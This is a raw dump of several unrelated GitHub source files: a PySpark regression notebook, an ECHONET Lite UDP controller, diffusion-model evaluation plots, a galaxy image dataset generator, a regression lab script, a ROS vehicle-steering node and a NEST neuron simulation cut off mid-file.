[fail](https://stackoverflow.com/questions/61056160/illegalargumentexception-column-must-be-of-type-structtypetinyint-sizeint-in) because the Linear Regression estimator expects a vector of values as input. We will fix that with VectorAssembler below. \n\n# COMMAND ----------\n\nfrom pyspark.ml.regression import LinearRegression\n\nlr = LinearRegression(featuresCol=\"bedrooms\", labelCol=\"price\")\n\n# Uncomment when running\nlrModel = lr.fit(trainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Vector Assembler\n# MAGIC \n# MAGIC What went wrong? Turns out that the Linear Regression **estimator** (`.fit()`) expected a column of Vector type as input.\n# MAGIC \n# MAGIC We can easily get the values from the `bedrooms` column into a single vector using `VectorAssembler` \n# MAGIC [Python](https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.ml.feature.VectorAssembler.html). \n# MAGIC VectorAssembler is an example of a **transformer**. \n# MAGIC Transformers take in a DataFrame, and return a new DataFrame with one or more columns appended to it. \n# MAGIC They do not learn from your data, but apply rule based transformations.\n# MAGIC \n# MAGIC You can see an example of how to use VectorAssembler on the [ML Programming Guide](https://spark.apache.org/docs/latest/ml-features.html#vectorassembler).\n\n# COMMAND ----------\n\nfrom pyspark.ml.feature import VectorAssembler\n\nvecAssembler = VectorAssembler(inputCols=[\"bedrooms\"], outputCol=\"features\")\nvecTrainDF = vecAssembler.transform(trainDF)\n\n# COMMAND ----------\n\nvecTrainDF.limit(10).display()\n\n# COMMAND ----------\n\nlr = LinearRegression(featuresCol=\"features\", labelCol=\"price\")\nlrModel = lr.fit(vecTrainDF)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Inspect the model\n\n# COMMAND ----------\n\nm = lrModel.coefficients[0]\nb = lrModel.intercept\n\nprint(f\"The formula for the linear regression line is y = {m:.2f}x + {b:.2f}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Apply model to test set\n\n# COMMAND ----------\n\nvecTestDF = vecAssembler.transform(testDF)\n\npredDF = lrModel.transform(vecTestDF)\n\npredDF.select(\"bedrooms\", \"features\", \"price\", \"prediction\").show()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Evaluate Model\n# MAGIC \n# MAGIC Let's see how our linear regression model with just one variable does.\n\n# COMMAND ----------\n\nfrom pyspark.ml.evaluation import RegressionEvaluator\n\nregressionEvaluator = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"price\", metricName=\"rmse\")\n\nrmse = regressionEvaluator.evaluate(predDF)\nr2 = regressionEvaluator.setMetricName(\"r2\").evaluate(predDF)\n\nprint(f\"RMSE is {rmse}\")\nprint(f\"R2 is {r2}\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC #### It's still not that great. Let's see how we can further decrease it in the next notebook.\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Code modified and enhanced from 2020 Databricks, Inc. All rights reserved.
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the
Apache Software Foundation.
\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"jvenetillo/InterDataScience","sub_path":"Module_B/Day3/04a_Linear Regression.py","file_name":"04a_Linear Regression.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30266617289","text":"import socket\nimport codecs\nimport time\n\nfrom node import Node\nfrom node import Parent\n\nE_HEADER = \"10810000\"\nE_SEOJ = \"05FF01\"\nE_OPC = \"01\"\nE_PDC1 = \"01\"\n\nclass ParentMain(Parent):\n def __init__(self, config: dict):\n super().__init__(config)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(5)\n self.__port = 3610\n self.sock.bind((\"0.0.0.0\", self.__port))\n\n def read(self, params=None):\n super().read(params)\n esv = \"62\"\n epc = \"80\"\n edt = \"00\"\n\n ip_addr = params[\"ip_addr\"]\n deoj = params[\"DEOJ\"]\n epc = params[\"EPC\"]\n\n #print(ip_addr)\n\n message = E_HEADER + E_SEOJ + deoj + esv + E_OPC + epc + E_PDC1 + edt\n msg = codecs.decode(message, \"hex\")\n\n self.sock.sendto(msg, (ip_addr, self.__port))\n \n try:\n data = self.sock.recvfrom(4048)\n except socket.timeout:\n return None\n\n datahex = codecs.encode(data[0], 'hex')\n datastr = codecs.decode(datahex, 'utf-8')\n\n r_addr = data[1][0]\n r_seoj = datastr[8:14]\n r_epc = datastr[24:26]\n value = datastr[28:30]\n \n #print(r_addr)\n #print(r_seoj)\n #print(r_epc)\n\n if ip_addr != r_addr:\n return None\n if int(deoj, 16) != int(r_seoj, 16):\n return None\n if int(epc, 16) != int(r_epc, 16):\n return None\n\n return value\n\n\n def write(self, value, params=None):\n super().write(value, params)\n esv = \"60\"\n epc = \"80\"\n edt = \"00\"\n\n ip_addr = params[\"ip_addr\"]\n deoj = params[\"DEOJ\"]\n epc = params[\"EPC\"]\n edt = value\n\n message = E_HEADER + E_SEOJ + deoj + esv + E_OPC + epc + E_PDC1 + edt\n msg = codecs.decode(message, \"hex\")\n\n self.sock.sendto(msg, (ip_addr, self.__port))\n\n def __del__(self):\n super().__del__()\n self.sock.close()\n\n\n","repo_name":"mmclsntr/liner","sub_path":"nodes/echonetcontrol/echonetlitecontroller.py","file_name":"echonetlitecontroller.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37977513053","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils.reconstruction import reconstruct\n\n\ndef _visualize_images(original_image,\n noisy_image,\n rec_baseline,\n rec_step,\n step,\n t=None):\n if t is not None:\n print(f't = {t}')\n print(f'Noise variance = {np.std(original_image - noisy_image)**2:.3g}')\n print(f'MSE baseline bilateral = {np.mean((rec_baseline - original_image)**2):.3g}')\n for rs in rec_step:\n print(f'MSE step sequential = {np.mean((rs - original_image)**2):.3g}')\n\n nrows = 1 + int(np.ceil(len(rec_step)/3))\n ncols = 3\n w, h, dpi = 1200, int(1200*nrows/ncols), 100\n fig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(w/dpi, h/dpi), dpi=dpi)\n\n axs = axs.ravel()\n\n axs[0].imshow(original_image.transpose(1, 2, 0))\n axs[0].set_title('Original image')\n\n axs[1].imshow(noisy_image.transpose(1, 2, 0))\n axs[1].set_title('Noisy input image')\n\n axs[2].imshow(rec_baseline.transpose(1, 2, 0))\n axs[2].set_title('Bilateral filter')\n\n for i, im in enumerate(rec_step):\n #if hasattr(im, \"__getitem__\"):\n # im=im[-1]\n axs[i+3].imshow(im.transpose(1, 2, 0))\n axs[i+3].set_title(f'step size = {step[i]}')\n\n for ax in axs:\n ax.set_axis_off()\n\n fig.tight_layout()\n plt.show()\n\n\ndef _visualize_images_plotly(original_image,\n noisy_image,\n rec_baseline,\n rec_step,\n step,\n t=None):\n import plotly.express as px\n\n images=np.concatenate([(noisy_image.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None],\n (original_image.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None], \n (rec_baseline.transpose(1, 2, 0).clip(0, 1)*255).astype(np.uint8)[None]\n ],\n axis=0)\n\n labels=['noisy', 'original', 'baseline']\n\n for i, im in enumerate(rec_step):\n images=np.concatenate([images,\n im.transpose(1, 2, 0)[None]\n ],\n axis=0)\n labels.append(f'step size = {step[i]}')\n\n nrows = 1 + int(np.ceil((len(rec_step)+1)/2))\n ncols = 2\n w, h, dpi = 1200, int(1200*nrows/ncols), 100\n\n print(w, h)\n\n fig = px.imshow(images, facet_col=0, facet_col_spacing=0.005, facet_row_spacing=0.05, width=w, height=h, facet_col_wrap=2)\n fig.for_each_annotation(lambda a: a.update(text=labels[int(a.text.split(\"=\")[-1])]))\n fig.show()\n\n\ndef reconstruct_and_compare(net,\n original_image,\n noisy_image,\n t,\n variance_schedule,\n device=None,\n sigma=None,\n step_size=1,\n overstep=0.5,\n output_folder=None,\n bilateral_parameters=(2, 0.7),\n return_sequences=True,\n use_plotly=False):\n \"\"\"Visualize a single reconstruction of an image with sequential and single step reconstruction.\n\n Parameters\n ----------\n net : torch.nn.Module\n the model that must reconstruct the image.\n original_image : 3D numpy array\n The original image to be reconstructed. Its shape must be ``(3, height, width)``.\n noisy_image : 3D numpy array\n The noisy image. Its shape must be ``(3, height, width)``.\n t : int\n timestep\n variance_schedule : array or array-like\n sequence for beta_t.\n device : string, optional\n sigma : {int, array or array-like}, optional\n noise sequence to add at each sequential reconstruction step.\n step_size : int, optional\n the number of original timesteps equivalent to the reconstruct timestep.\n overstep : float, optional\n correction factor to the predicted noise. For more info, see Stable diffusion paper.\n The default is 0.5.\n output_folder : str, optional\n if provided, save the original image, noisy image and reconstructinos output_folder.\n bilateral_parameters : tuple(float, float), optional\n set the parameters for the baseline bilateral filtering. The elements are\n ``(sigmaSpace, sigmaColor)``. Default is (2, 0.7).\n return_sequences : bool, optional\n if set to False, returns the reconstructed images for each step_size.\n If set to True, returns the entire reconstruction sequence for each step_size.\n Default is True.\n use_plotly : bool, optional\n Choose whether to use ``plotly`` or ``matplotlib``. Default is False.\n\n Returns\n 3D numpy array (or 4D numpy array if ``return_sequences`` is set to True)\n reconstructed image with shape ``(n_channels, spatial_1, spatial_2)``. \n \"\"\"\n\n if not hasattr(step_size, \"__getitem__\"):\n step_size = [step_size]\n\n rec_baseline = cv2.bilateralFilter(np.asarray(noisy_image, dtype=np.float32).transpose(1, 2, 0),\n d=-1,\n sigmaSpace=bilateral_parameters[0],\n sigmaColor=bilateral_parameters[1])\n\n rec_step = []\n for s in step_size:\n rec_step.append(reconstruct(net, noisy_image, t, variance_schedule, s, overstep=overstep, sigma=sigma, return_sequences=return_sequences, device=device))\n\n if output_folder is not None:\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n plt.imsave(os.path.join(output_folder, 'original.png'), original_image.transpose(1, 2, 0))\n print('original saved')\n plt.imsave(os.path.join(output_folder, 'noisy.png'), noisy_image.transpose(1, 2, 0))\n print('noisy saved')\n plt.imsave(os.path.join(output_folder, 'baseline.png'), rec_baseline)\n print('baseline saved')\n\n for s, im in zip(step_size, rec_step):\n if return_sequences:\n plt.imsave(os.path.join(output_folder, f'rec_step_{s}.png'), im[-1].transpose(1, 2, 0))\n else:\n plt.imsave(os.path.join(output_folder, f'rec_step_{s}.png'), im.transpose(1, 2, 0))\n print(f'step {s} saved')\n\n if use_plotly:\n _visualize_images_plotly(original_image=original_image,\n noisy_image=noisy_image,\n rec_baseline=rec_baseline.transpose(2, 0, 1),\n rec_step=[r[-1] for r in rec_step] if return_sequences else rec_step,\n step=step_size,\n t=t)\n else:\n _visualize_images(original_image=original_image,\n noisy_image=noisy_image,\n rec_baseline=rec_baseline.transpose(2, 0, 1),\n rec_step=[r[-1] for r in rec_step] if return_sequences else rec_step,\n step=step_size,\n t=t)\n \n return [r.transpose(0, 2, 3, 1) for r in rec_step] if return_sequences else rec_step.transpose(1, 2, 0)\n\n\ndef visualize_reconstruction_sequence(rec_images):\n import plotly.express as px\n fig = px.imshow(rec_images, animation_frame=0, width=1000,height=1000)\n fig.show()\n","repo_name":"EnricoPittini/denoising-diffusion-models","sub_path":"utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70027865156","text":"import astropy\nimport os\n\nfrom skimage.transform import resize\nfrom astropy.io import fits\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom multiprocessing import *\nfrom tqdm import tqdm\nimport h5py\nimport tensorflow as tf\nimport pickle\nfrom PIL import Image\n\nfrom lensmcmc.tools import generic_yaml_loader\nfrom lensmcmc.tools.lensing import pixels\nfrom lensmcmc.tools.lensing import counts_AB\nfrom lensmcmc.models.sourcemodels import Sersic\n\nSTATS_FILE = f'../../data/Sersic/Sersic_mag_22_stats.p'\nH5PY_PATH = f\"../../data/Sersic/Sersic_mag_22r%1d.h5\"\nTFRECORDS_PATH = f\"../../data/Sersic_mag_22r%1dp%1d.tfrecords\"\n\ninstrument = generic_yaml_loader('instruments/bells.yaml')\n\npix = pixels(instrument['pixel_size'], instrument['field_of_view'] + 5.9 * instrument['pixel_size'])\n\nNUM_SAMPLES = 100\nSAMPLE_PATH = f'../../data/Sersic/Sersic_mag_22_samples'\n\n\nPARTS_H5PY = 1\nPARTS_TFRECORDS = 4\n\ndef create_tfrecord(_image, _labels, _writer):\n # image = open(image_dir + image_file, mode='rb').read()\n # image_decoded = tf.image.decode_image(image)\n\n ex = tf.train.Example(features=tf.train.Features(feature={\n 'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=_image.shape)),\n 'label': tf.train.Feature(float_list=tf.train.FloatList(value=_labels)),\n 'data': tf.train.Feature(float_list=tf.train.FloatList(value=_image.reshape(-1)))\n }))\n _writer.write(ex.SerializeToString())\n\ndef estimate_mean(h5py_file):\n \n mean_acc = np.zeros(shape=(5,))\n count = 0\n \n for fit_file in tqdm(file_list):\n \n count += 1\n mean_acc += np.mean(image, axis=(0,1))\n \n \n return mean_acc / len(file_list)\n \nclass SersicGenerator:\n def __init__(self):\n pass\n \n def generate(self):\n \n galaxy = {\n 'x_position': np.random.uniform(-1.0, 1.0),\n 'y_position': np.random.uniform(-1.0, 1.0),\n 'radius': np.random.uniform(1.0, 4.0),\n 'sersic_index': np.random.uniform(1.0, 4.0),\n 'magnitude': 22, #np.random.uniform(16.0, 28.0),\n 'axis_ratio': np.random.uniform(0.4, 1.0),\n 'position_angle': np.random.uniform(0.0, np.pi)\n }\n\n # Convert magnitude to counts\n total_counts = counts_AB(galaxy['magnitude'], instrument)\n\n # Initialise galaxy model\n galaxy_light_model = Sersic({\n 'x_position': galaxy['x_position'],\n 'y_position': galaxy['y_position'],\n 'radius': galaxy['radius'],\n 'sersic_index': galaxy['sersic_index'],\n 'total_counts': total_counts * (instrument['pixel_size'] ** 2),\n 'axis_ratio': galaxy['axis_ratio'],\n 'position_angle': galaxy['position_angle']\n })\n\n labels = [galaxy['x_position'], galaxy['y_position'], galaxy['radius'], galaxy['sersic_index'],\n galaxy['axis_ratio'], galaxy['position_angle'], total_counts * (instrument['pixel_size'] ** 2)]\n\n # Calculate brightness\n image = instrument['exposure_time'] * galaxy_light_model.ray_trace(pix, sub=10)[:,:,None]\n \n return image, np.array(labels)\n \n def close(self):\n pass\n \ndef save_part_tfrecords(num_data, rank):\n \n n = rank\n images = []\n writer_dict = {}\n\n for resolution_level in range(2, 8 + 1):\n writer_dict[resolution_level] = tf.io.TFRecordWriter(TFRECORDS_PATH % (resolution_level,n))\n\n generator = SersicGenerator()\n mean_ = []\n \n for i in tqdm(range(num_data)):\n \n image, labels = generator.generate()\n mean = np.mean(image, axis=(0,1))\n mean_.append(mean)\n \n for resolution_level in range(2,8+1):\n\n \n resolution = image.shape[0] // (2** (8 - resolution_level))\n downsampled_image = resize(image, (resolution, resolution), order=1)\n\n downsampled_image = np.transpose(downsampled_image, (2,0,1))\n \n \n create_tfrecord(downsampled_image, labels, writer_dict[resolution_level])\n\n for resolution_level in range(2,8+1):\n writer_dict[resolution_level].close()\n \n mean_ = np.array(mean_)\n mean_ = np.mean(mean_, axis=0)\n \n generator.close()\n \n return mean_\n \ndef save_samples(num_samples):\n \n generator = SersicGenerator()\n \n for i in tqdm(range(num_samples)):\n \n image, labels = generator.generate()\n channel = image[...,0] \n \n cm = plt.cm.ScalarMappable(None, cmap='magma')\n cmap = cm.get_cmap()\n channel = (channel - np.min(channel)) / (np.max(channel) - np.min(channel))\n rgb_img = cmap(channel)[..., :3]\n rgb_img = rgb_img * 255\n rgb_img = rgb_img.astype(np.uint8)\n\n result = Image.fromarray(rgb_img)\n result.save(os.path.join(SAMPLE_PATH, '%05d.png' % i))\n with open(os.path.join(SAMPLE_PATH, '%05d.npy' % i), 'wb') as handle:\n np.save(handle, image)\n \ndef save_part_h5py(num_data, rank):\n\n images = []\n writer_dict = {}\n \n generator = SersicGenerator() \n mean_ = []\n\n with h5py.File(H5PY_PATH % rank, 'a') as hf:\n \n for i in tqdm(range(num_data)):\n\n image, labels = generator.generate()\n mean = np.mean(image, axis=(0,1))\n mean_.append(mean)\n \n image_shape = image.shape\n\n grp = hf.create_group(\"%05d\" % i)\n\n image_data = grp.create_dataset(\n name='data', data=image.astype('float32'),\n shape=image.shape, maxshape=image_shape, compression=\"gzip\")\n\n label_data = grp.create_dataset(\n name='labels', data=labels.astype('float32'),\n shape=labels.shape)\n \n mean_ = np.array(mean_)\n mean_ = np.mean(mean_, axis=0)\n \n generator.close()\n \n return mean\n\nif __name__ == '__main__':\n \n num_galaxies = 50000\n \n save_samples(50)\n\n print('preparing H5PY...')\n with Pool(processes=PARTS_H5PY) as pool:\n \n print('Saving galaxies')\n \n means_per_file_list = pool.starmap(save_part_h5py, zip([num_galaxies], [0]))\n mean = np.zeros_like(means_per_file_list[0])\n for e in means_per_file_list: \n mean += e\n mean = mean / len(means_per_file_list)\n \n print('mean h5py: ', [mean])\n \n with h5py.File(H5PY_PATH % 0, 'r') as f:\n keys = list(f.keys())\n var_ = []\n for key in tqdm(keys):\n group_selector = f[key]\n data = group_selector['data'][:]\n var_.append(np.mean(np.square(data - mean), axis=(0,1)))\n \n var_ = np.array(var_)\n \n var = np.mean(var_, axis=0)\n \n std = np.sqrt(var)\n \n print('mean, std', [mean, std])\n \n \n print('preparing TFRECORDS...')\n with Pool(processes=PARTS_TFRECORDS) as pool:\n \n print('Saving galaxies')\n \n means_per_file_list = pool.starmap(save_part_tfrecords, zip([num_galaxies // PARTS_TFRECORDS] * PARTS_TFRECORDS, range(PARTS_TFRECORDS)))\n mean = np.zeros_like(means_per_file_list[0])\n for e in means_per_file_list: \n mean += e\n mean = mean / len(means_per_file_list)\n \n print('mean tfrecords: ', [mean])\n \n with open(STATS_FILE, 'wb') as handle:\n pickle.dump([mean,std], handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n print('finished')\n","repo_name":"Akanota/galaxies-metrics-denoising","sub_path":"preprocessing/Sersic/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70692543874","text":"import os\nfrom sklearn.metrics import mean_squared_error\n\nfrom lab6.regression.my_regression import my_regression\nfrom lab6.regression.sk_learn_regression import sk_learnRegression\nfrom lab6.utils.data_division import divideData\nfrom lab6.utils.plotters import plotGDP, plotFreedom, plotDataHistogram, plotAll, plotSplitData\nfrom lab6.utils.reader import loadAsDF, loadData, correlatedDF\n\nif __name__ == '__main__':\n crtDir = os.getcwd()\n filePath = os.path.join(crtDir, 'data', 'v1_world-happiness-report-2017.csv')\n gdp, freedom, happiness = loadAsDF(filePath)\n # gdp1, freedom1, happiness1 = loadData(filePath, 'Economy..GDP.per.Capita.', 'Freedom', 'Happiness.Score')\n mdl = my_regression(gdp, freedom, happiness)\n print('regression using the formula in the lab6 jupyter notebook:\\n', mdl)\n\n trainInputs, trainOutputs, validationInputs, validationOutputs = divideData(gdp, freedom, happiness)\n\n toolModel, regressor = sk_learnRegression(trainInputs, trainOutputs)\n computedValidationOutputs = regressor.predict([x for x in validationInputs])\n\n print('regression using sk-learn:\\n', toolModel)\n\n error = 0.0\n for t1, t2 in zip(computedValidationOutputs, validationOutputs):\n error += (t1 - t2) ** 2\n error = error / len(validationOutputs)\n print(\"prediction error (manual): \", error)\n\n error = mean_squared_error(validationOutputs, computedValidationOutputs)\n print(\"prediction error (tool): \", error)\n\n plotDataHistogram(gdp, 'GDP')\n plotDataHistogram(freedom, 'Freedom')\n plotDataHistogram(happiness, 'Happiness')\n plotAll(gdp, freedom, happiness)\n plotGDP(gdp, happiness)\n plotFreedom(freedom, happiness)\n plotSplitData([trainInputs, trainOutputs], [validationInputs, validationOutputs])\n","repo_name":"andrei45635/AI","sub_path":"lab6/laborator6.py","file_name":"laborator6.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33975680687","text":"#!/usr/bin/env python\n# -*-coding: utf-8-*-\nimport serial\nimport time \nimport struct\nfrom math import radians\nfrom math import degrees\nfrom math import cos\nfrom math import sin\nfrom math import asin\nfrom math import pow\nfrom math import atan2\nimport csv\nfrom time import sleep\nimport rospy\nfrom master.msg import sync_msg\n\n# ser = serial.Serial('/dev/ttyUSB2', 115200)\nser = serial.Serial('/dev/pts/16', 38400)\n# path_x = [ 0, 0, 0, 10];\n# path_y = [ 10, 20, 30, 40 ]; \npath_x = [ ];\npath_y = [ ];\npath_k = [ ];\npath_idx = 0;\nlook_ahead = 3\nspeed_lim = 12\nfirst_chk = True\nk = 0.2\n\n\n#gear 0:D, 1:N, 2:R\ndef send_packet(steering, speed, gear):\n result = ser.readline() # erp -> pc\n cnt = result[15]\n\n result = struct.pack('!BBBBBBHhBBBB', 0x53, 0x54, 0x58, 0x01, 0x00, gear, int(speed),\n steering, 0x01, cnt, 0x0D, 0x0A ) # big endian 방식으로 타입에 맞춰서 pack \n ser.write(result)\n\n\ndef action_lane_right():\n start_t = time.time()# 시작 시간 저장\n while((time.time()-start_t)<3):\n send_packet(30,10, 0) \n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(0,5, 0)\n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(-30,10, 0)\n\n\ndef action_lane_left():\n start_t = time.time()# 시작 시간 저장\n while((time.time()-start_t)<3):\n send_packet(-30,10, 0) \n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(0,5, 0)\n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(30,10, 0)\n\n\ndef action_parking():\n start_t = time.time()\n while((time.time()-start_t)<6):\n send_packet(30,7, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<2):\n send_packet(0,2, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<5):\n send_packet(0,0, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<3):\n send_packet(0,6, 2)\n\n start_t = time.time()\n while((time.time()-start_t)<3.5):\n send_packet(30,7, 0) \n \n\ndef action_break_crosswalk(cnt):\n start_t = time.time()\n while((time.time()-start_t)<5):\n send_packet(0,0, 0)\n\n\ndef serWrite(speed, steering, cnt, cur_mode):\n input_speed = speed\n break_val = 0x01\n if cur_mode == 'ctrl_normal':\n break_val = 0x01\n elif cur_mode=='ctrl_slow_1':\n speed*=0.6\n break_val = 0x01\n elif cur_mode=='ctrl_slow_2':\n speed*=0.3\n break_val = 0x01\n elif cur_mode=='ctrl_slow_3':\n speed*=0.3\n break_val=0x20\n elif cur_mode== 'ctrl_break':\n speed=0\n # break_val=0x60\n if input_speed <70:\n break_val = input_speed - int(0.4 *cur_speed)\n if break_val <= 0:\n break_val = 1\n if input_speed <100:\n break_val = input_speed + 10 - int(0.3 *cur_speed)\n if break_val <= 0:\n break_val = 1\n else:\n break_val = input_speed + 20 - int(0.3*cur_speed)\n if break_val <= 0:\n break_val = 1\n elif cur_mode== 'ctrl_E_break':\n speed=0\n break_val = 0xff\n elif cur_mode== 'ctrl_break_crosswalk':\n action_break_crosswalk()\n return\n elif cur_mode== 'ctrl_chng_right':\n action_lane_right()\n return\n elif cur_mode== 'ctrl_chng_left':\n action_lane_left()\n return\n elif cur_mode== 'ctrl_parking':\n action_parking()\n return\n print('speed : ', speed);\n print(\"ser_write\", speed, steering, cnt, cur_mode)\n # steering 값 2000 넘길 시 2000으로 설정\n if abs(steering)>2000:\n if steering>0:\n steering = 2000\n else :\n steering =-2000\n # 기어 기본값 0: 전진, 1:후진\n print(\"speed \", speed, \"steering \", steering, \"cnt : \", cnt)\n result = struct.pack('!BBBBBBHhBBBB', 0x53, 0x54, 0x58, 0x01, 0x00, 0x00, int(speed),\n steering, break_val, cnt, 0x0D, 0x0A ) # big endian 방식으로 타입에 맞춰서 pack \n print(\"pc : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13] )\n ser.write(result)\n \n \ndef Y_angle(cur_x, cur_y, cur_yaw, target_x, target_y): # By 삼각함수 멋쟁이 예환\n print(\"Y_angle\", cur_x, cur_y, cur_yaw, target_x, target_y)\n yaw=radians(cur_yaw)\n th = cur_yaw - degrees(atan2((target_y - cur_y), (target_x - cur_x)))\n # delta = degrees(atan2(2*1.1*sin(radians(th))/look_ahead,1))\n if abs(th)>180:\n if (th < 0) :\n th += 360\n else :\n th -= 360\n\n print(\"Theta : \", th)\n if abs(th)>30:\n if th > 0:\n return 30\n else :\n return -30\n else :\n return int(th)\n\ndef cal_steering(cur_x, cur_y, cur_yaw, look_ahead):\n print(\"cal_steering\", cur_x, cur_y, cur_yaw) \n global path_idx\n print(\"path_idx\", path_idx) \n target_x = path_x[path_idx]\n target_y = path_y[path_idx]\n dis = pow(pow(abs(target_x - cur_x),2) + pow(abs(target_y - cur_y),2), 0.5)\n print(\"distance\", dis)\n if dis <= look_ahead:\n print(\"### HIT target!!! ###\")\n path_idx += 1\n return cal_steering(cur_x, cur_y, cur_yaw, look_ahead)\n else : \n return Y_angle(cur_x, cur_y, cur_yaw, target_x, target_y)\n\ndef cal_lookahead(vel):\n # look_ahead = k*vel/36 + 3.0\n look_ahead = 3.3\n return look_ahead\n\n# msg 수신시 호출되는 함수\ndef getSyncMsg(msg):\n print(msg)\n global first_chk\n global path_idx\n print(\"======== get a odo msg =========\")\n cur_x = msg.gps_x\n cur_y = msg.gps_y\n cur_yaw = msg.imu_yaw\n cur_mode = msg.ctrl_mode\n print(cur_yaw)\n \n if(first_chk):\n find_first_pathidx(cur_x, cur_y, cur_yaw)\n\n if cur_yaw > 90 and cur_yaw < 270:\n cur_yaw = -(cur_yaw-90);\n else :\n if cur_yaw < 90:\n cur_yaw = (90-cur_yaw);\n else :\n cur_yaw = 360-cur_yaw +90 \n\n cnt=0x00;\n #print('a')\n print('before')\n result = ser.readline() # erp -> pc\n print('after')\n #print(result) \n if path_idx != len(path_k):\n if abs(path_k[path_idx]) > 0.002 :\n if cur_mode == 2:\n cur_mode = 1\n\n print(\"len\", len(result)) \n if len(result) > 17:\n print(\"erp : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13], result[14], result[15], result[16], result[17])\n cnt = result[15]\n print(cnt)\n look_ahead = cal_lookahead(result[6])\n steering = cal_steering(cur_x, cur_y, cur_yaw, look_ahead);\n serWrite(int(speed_lim*10), int(steering*71), cnt, cur_mode)\n # cnt가 10일때 패킷이 잘려서 2번에 걸쳐 들어옴.+++++++++++++++++++++++++++++ 0x0a값이 아스키코드 LF(new line)!!!\n elif len(result) == 16:\n print(\"erp : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13], result[14], result[15])\n add_result = ser.readline() # erp -> pc\n print(cnt) \n look_ahead = cal_lookahead(result[6])\n steering = cal_steering(cur_x, cur_y, cur_yaw, look_ahead);\n serWrite(int(speed_lim*10), int(steering*71), 10, cur_mode)\n # serWrite(int(speed_lim*10), int(steering*71), 10, cur_mode)\n print(\"cur_speed : \" , result[7])\n\ndef find_first_pathidx(cur_x, cur_y, cur_yaw):\n global path_idx\n global first_chk\n min_idx = 0\n min_dis = 9999999999\n size = len(path_x)\n for i in range(size):\n x = path_x[i]\n y = path_y[i]\n dis = (x-cur_x)**2 + (y-cur_y)**2\n if(min_dis > dis):\n min_dis = dis\n min_idx = i\n print(\"fin_dis : \", min_dis)\n print(\"fin_idx : \", min_idx)\n path_idx = min_idx\n first_chk = False\n yaw = Y_angle(cur_x, cur_y, cur_yaw, path_x[min_idx], path_y[min_idx])\n if(abs(yaw)>90):\n path_idx += 1\n\n\n\ndef main(): \n with open('/home/wego/catkin_ws/src/master/src/waypoint/path2.csv', mode='r') as csv_file:\n # with open('/home/wego/catkin_ws/src/master/src/waypoint/k-city_test_1.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for next_r in csv_reader:\n path_x.append(float(next_r['X']))\n path_y.append(float(next_r['Y']))\n path_k.append(float(next_r['K']))\n print(\"local_x \",float(next_r['X']))\n print(\"local_y \",float(next_r['Y']))\n\n rospy.init_node('control_node', disable_signals=False)\n rospy.loginfo(\"-------control node start!-------\")\n rospy.Subscriber(\"/master\", sync_msg, getSyncMsg)\n rospy.loginfo(\"-------start spin-------\")\n rospy.spin()\n rospy.loginfo(\"-------finish spin-------\")\n \n \nif __name__ == '__main__':\n print(\"Pure pursuit path tracking simulation start\")\n main()","repo_name":"gigacha/Control","sub_path":"control_test/src/control_node.py","file_name":"control_node.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34773601939","text":"#! /usr/bin/env python\n\n\"\"\"\nPlot several runs of the iaf_cond_exp_sfa_rr neuron with no input and\nvarious initial values for the membrane potential.\n\"\"\"\n\nimport nest \nimport numpy\nimport pylab\n\nfor vinit in numpy.arange(-100, -50, 10, float):\n\n nest.ResetKernel()\n\n cbn = nest.Create('iaf_cond_exp_sfa_rr')\n\n # set the initial membrane potential\n nest.SetStatus(cbn, 'V_m', vinit)\n\n voltmeter = nest.Create('voltmeter')\n nest.SetStatus(voltmeter, {'withtime': True})\n nest.Connect(voltmeter, cbn)\n\n nest.Simulate(75.0)\n\n t = nest.GetStatus(voltmeter,\"events\")[0][\"times\"]\n v = 